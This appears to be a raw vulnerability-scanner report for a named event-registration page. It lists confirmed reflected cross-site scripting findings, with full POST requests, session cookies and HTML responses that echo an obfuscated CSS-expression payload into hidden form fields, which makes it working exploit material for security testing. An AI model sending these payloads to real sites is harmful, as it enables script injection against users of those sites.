color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST " stYle="x:expre/**/ssion(alert(9))
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=0474164f8e4a4df88d90f25ffe9e2bfd
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1548
Accept-Encoding: gzip, deflate

--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="action"

preload_category
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="eventid"

19301
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="categoryid"

-1
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="language"

" stYle="x:expre/**/ssion(netsparker(9))
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="reference"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="eb"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="admin"

-1
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="bridgeid"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="discountcode"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65419]"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65420]"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65413]"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65411]"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65421]"

3
--0474164f8e4a4df88d90f25ffe9e2bfd
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--0474164f8e4a4df88d90f25ffe9e2bfd--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:51:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3185
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410"></label> </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409"></label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415"></label> $899.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419"></label> $399.00 </td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420"></label> </td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413"></label> </td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411"></label> </td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421"></label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407"></label> </td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=a8cca55297f7469999a0ba4a9025d744
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1550
Accept-Encoding: gzip, deflate

--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="action"

preload_category
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="eventid"

19301
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="categoryid"

-1
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="language"

eng
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="eb"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="admin"

-1
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="bridgeid"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="discountcode"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65419]"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65420]"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65413]"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65411]"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65421]"

3
--a8cca55297f7469999a0ba4a9025d744
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--a8cca55297f7469999a0ba4a9025d744--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:51:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3410
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input 